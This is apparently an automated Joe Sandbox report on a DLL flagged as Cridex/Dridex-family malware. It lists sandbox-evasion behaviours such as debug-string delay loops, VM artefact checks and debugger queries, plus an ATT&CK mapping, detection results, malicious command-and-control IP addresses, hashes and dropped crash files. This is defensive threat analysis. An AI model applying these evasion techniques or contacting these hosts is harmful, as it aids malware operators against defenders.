Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1126

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1125

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EB30730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6EB30730

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000005.00000002.320067944.0000000004630000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.318716498.0000000004668000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000002.320142264.0000000004668000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EB26D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6EB26D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EB33138 RtlAddVectoredExceptionHandler,

0_2_6EB33138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.689868887.0000000001170000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.297771954.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.295296097.0000000003860000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.689868887.0000000001170000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.297771954.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.295296097.0000000003860000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.689868887.0000000001170000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.297771954.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.295296097.0000000003860000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.689868887.0000000001170000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.297771954.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.295296097.0000000003860000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,		0_2_6EB26D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,		2_1_6EB26D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6EB26D0C

Source: Amcache.hve.5.dr, Amcache.hve.LOG1.5.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr, Amcache.hve.LOG1.5.dr	Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
triage_dropped_file.dll	19%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.6eb20000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.1260000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6eb20000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.1260000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6eb20000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.1260000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.1.rundll32.exe.6eb20000.0.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.760000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.6eb20000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.baxleystamps.comDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.5.dr	false		high
http://www.baxleystamps.comDVarFileInfo$	loaddll32.exe, 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.298260895.000000006EB3F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544526
Start date:	23.12.2021
Start time:	15:58:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	triage_dropped_file.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 95% (good quality ratio 92.4%) Quality average: 78.8% Quality standard deviation: 26.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.189.173.21 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
85.10.248.28	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	st5ldRsn31.exe	Get hash	malicious	Browse	148.251.234.83
	sIPMFfQk3T.exe	Get hash	malicious	Browse	148.251.234.83
	ZJ9zMsr46c.exe	Get hash	malicious	Browse	148.251.234.83
	qaZtULe0mI.exe	Get hash	malicious	Browse	49.12.34.17
	4AJ8E4v5e7	Get hash	malicious	Browse	168.119.78.156
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_3e2aba14ae6839fafa2e423496d524d852da7165_82810a17_041bce1d\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.914992745908544
Encrypted:	false
SSDEEP:	192:CcXi390oX7m/HBUZMX4jed+9T/u7s6S274ItWc+:lXi3TXi/BUZMX4je0/u7s6X4ItWc+
MD5:	FFC283118AA06FE416FAFB456382ABA0
SHA1:	9A144EDE4DB5AF94BED38F4CBC76907AAAF22074
SHA-256:	8E42A49718BFB041FCDFEC95F0CB56404C26673C16E3CA3FD277D7FE700F6D98
SHA-512:	B7E5796FA394342342B7198665C186379D6F45ACB685F8738F9E5967007BA346851C21BFC6CD7E3D96B73B19154D3888F21F78971F1BEB3C414DB2F09D786095
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.7.7.7.3.1.8.9.7.6.4.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.7.7.7.3.6.2.4.1.3.6.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.9.2.2.a.6.c.-.4.b.f.a.-.4.d.0.2.-.9.2.e.6.-.a.f.3.0.f.0.5.3.b.c.7.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.1.f.8.5.5.8.-.4.4.8.f.-.4.1.e.1.-.a.6.1.1.-.d.9.c.8.a.0.1.e.0.2.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.8.-.0.0.0.1.-.0.0.1.c.-.2.f.9.e.-.d.5.7.c.5.9.f.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB361.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 24 00:02:13 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	43206
Entropy (8bit):	2.189975589605877
Encrypted:	false
SSDEEP:	192:J2ZlWZxL5EcqNLO5SkbmAx//Cz8X+tH+Z/ift9yb7mNgR1n5:Jz9N5Lb2HZU/iV9ybIQ5
MD5:	4DED7EA4DBDB77A88A5165D62BA5657E
SHA1:	5745929C3EEE8276778432A70358FD7D21C3440D
SHA-256:	E5B50B049B76A84A855932293C56ABEECA7F0FB914C2162D151A98E2D50E1DC0
SHA-512:	DC346283D3067A695798153E6A8255320E667BB1388E95EE72C6CCB04576CA46C8AB2226978E01D1946B83C4E64E1C313D80D84B2386CFBCAC27EA33E2AC1552
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........a.........................................-..........T.......8...........T............................................................................................................U...........B...... .......GenuineIntelW...........T..............a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB03.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8276
Entropy (8bit):	3.6904332711477816
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiBy67zHs9x6Y4R6CgmfT+PSuCprC89bOosfJ6m:RrlsNiU6Q6Ye6CgmfTGSNObf1
MD5:	483B84C6B648D40698425111147992D6
SHA1:	58ABB6F98BCD71702EC2A80684CE0501B6627801
SHA-256:	E8CE58DE9BC83D21AF4A6397844B5AFC072F30F413EAC882B41533FA9485EB8E
SHA-512:	E34A0A4C81750B458A29C38EEFB6B46D9DE207DB8604ED717067DFA7A9C42DA0D91561984940EAE82907919CCEF50CA39F931F8D1D684C1C1B3AEC6045B07344
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD27.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	4.463350423834014
Encrypted:	false
SSDEEP:	48:cvIwSD8zsRJgtWI9ECWSC8BE8fm8M4JCdsFv2hFtUw+q8/iJKB4a4SrSzd:uITfjDDSN7Jja1dTaDWzd
MD5:	9387DBD51C297B4F39DAF45EC8D36822
SHA1:	9086AEFE076B0FA2C449CE254A1AAE33BB1544A4
SHA-256:	1A37AA5BFB91650D5CB1D5FC29A59425F5785443B44BC8AA287952D399476C1A
